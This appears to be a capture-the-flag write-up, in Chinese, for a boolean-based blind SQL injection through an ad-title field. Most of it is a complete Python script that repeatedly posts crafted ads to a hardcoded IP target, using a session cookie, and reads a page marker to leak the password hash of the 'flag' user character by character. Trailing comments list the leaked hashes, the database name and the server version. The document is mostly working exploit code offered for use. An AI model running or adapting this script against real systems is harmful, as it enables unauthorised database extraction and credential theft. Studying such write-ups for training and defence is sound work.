知识点:
sql注入
注入点（布尔盲注，每次探测只泄露一个字符；MySQL 的 substr 下标从 1 开始，脚本里 i 取 1..39，下面模板中的 0 只是占位；ascii() 只取参数的首字符，所以 ascii('53') 等价于 ascii('5')）: 0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0
先注册个用户,然后发布广告

广告的title可以注入
注入脚本
# coding=utf-8
import re
import requests
import sys
import time
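# Boolean-based blind SQL injection through the ad title. Each probe posts one
# ad whose title injects ``ascii(substr(<subquery>, pos, 1)) > ascii('<ch>')``,
# opens the ad's detail page and reads the verdict off the page, then empties
# the ad list so the next probe finds exactly one ad.
#
# Fixes over the original: the ad-id regex match is checked before .group(1)
# (a dead session cookie used to crash with AttributeError instead of a
# message), the ad list is emptied even when a probe fails, extraction stops
# at the end of the value instead of appending a spurious '0' for every
# position past the end (ascii('') is 0, so ``0 > ascii('0')`` is always
# false), a character outside the alphabet is reported instead of silently
# shifting the output, and nothing talks to the network at import time.

header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
    # Session of the account registered by hand before running this script;
    # replace it when the PHP session expires (symptom: no ad in the listing).
    "Cookie": "PHPSESSID=0lr6ck9sarpj2i9u8upp9r9nbe",
}
url = "http://211.159.177.185:23456/"
add_url = url + "addads.php"
clear_url = url + "empty.php"

# Candidate characters in ascending ASCII order. The oracle only answers
# "is the real character greater than this one?", so the scan takes the first
# candidate for which the answer is "no" -- that is only correct on a sorted
# list. The hex alphabet suffices for the MD5 digests stored in users.pass.
str_str = '0123456789abcdef'
# Wider alphabet for non-hex values (version(), database(), ...). Sort it by
# ASCII code before use, e.g. ''.join(sorted(...)); as written it is not.
# str_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.,/!@#$%^&*`.'

# Subquery whose single-row result is leaked; swap for "select/**/version()"
# or "database()" to enumerate the server instead.
DEFAULT_SUBQUERY = "select/**/pass/**/from/**/users/**/where/**/name='flag'"

# Text that the detail page shows when the injected condition evaluated to
# true (inferred from the original script's branch; confirm against the
# target if the leaked value looks inverted).
MARKER = 'ckckckc'

# The ad listing links to detail.php?id=<id>'>. The greedy group is kept from
# the original and relies on there being exactly one ad on the page, which is
# why condition_holds() empties the list after every probe.
AD_ID_RE = re.compile(r'detail.php\?id=(.*)\'>')


def build_payload(pos, ch, subquery=DEFAULT_SUBQUERY):
    """Return the ad title that tests one character of ``subquery``'s result.

    The title closes the quoted string in the vulnerable statement, ORs in
    ``ascii(substr((subquery), pos, 1)) > ascii('ch')`` and re-opens the
    string; ``/**/`` stands in for the spaces the application filters.

    ``pos`` is 1-based (MySQL SUBSTR semantics). ``ch`` is a single candidate
    character, or ``''`` to test whether any character exists at ``pos``
    (``ascii('')`` is 0). ``ch`` must not contain a single quote.
    """
    return ("0'/**/||/**/ascii(substr((" + subquery + ")," + str(pos)
            + ",1))/**/>/**/ascii('" + ch + "')/**/||/**/'0")


def condition_holds(session, title):
    """Post an ad titled ``title``, open it and report the oracle's verdict.

    Returns True when the detail page contains MARKER (injected condition
    true), False otherwise. The ad list is emptied afterwards in every case,
    including errors, so the next probe is unambiguous.

    Raises RuntimeError when the listing shows no ad -- in practice a dead
    session cookie or a rejected title.
    """
    session.post(add_url, headers=header,
                 data={'title': title, 'content': 'aaaaa', 'ac': 'add'})
    try:
        listing = session.get(url, headers=header)
        match = AD_ID_RE.search(listing.text)
        if match is None:
            raise RuntimeError(
                "no ad found in the listing; is the PHPSESSID cookie still valid?")
        detail = session.get(url + 'detail.php?id=' + match.group(1), headers=header)
        return MARKER in detail.text
    finally:
        session.get(clear_url, headers=header)


def extract(session, subquery=DEFAULT_SUBQUERY, alphabet=str_str, max_len=39):
    """Leak ``subquery``'s result one character at a time and return it.

    For each position an empty-character probe first checks that a character
    exists there; then ``alphabet`` (ascending ASCII order) is scanned and the
    first candidate the real character is not greater than is taken. Stops at
    the end of the value or after ``max_len`` characters, whichever is first.
    A position whose character is outside ``alphabet`` yields '?' so later
    characters keep their position. Prints the partial result as it grows.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # ascii('') == 0, so "char > ascii('')" is false only past the end.
        if not condition_holds(session, build_payload(pos, '', subquery)):
            break
        for ch in alphabet:
            if not condition_holds(session, build_payload(pos, ch, subquery)):
                result += ch
                break
        else:
            # Real character is greater than every candidate: widen alphabet.
            result += '?'
        print(result)
    return result


def main():
    session = requests.session()
    # Same warm-up request as the original; the cookie is sent explicitly on
    # every request anyway.
    session.get(url, headers=header)
    print(extract(session))


if __name__ == "__main__":
    main()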
# 库名 web1
# admin密码 53e217ad4c721eb9565cf25a5ec3b66e
# 账号 密码
# flag f8ae51b4f44b623f665539af7d2b83f9
# admin 53e217ad4c721eb9565cf25a5ec3b66e
# fa2a0ad3ee00aa702e640afbc097e501cce
# secure_file_priv /var/lib/mysql/files
# version 8.0.17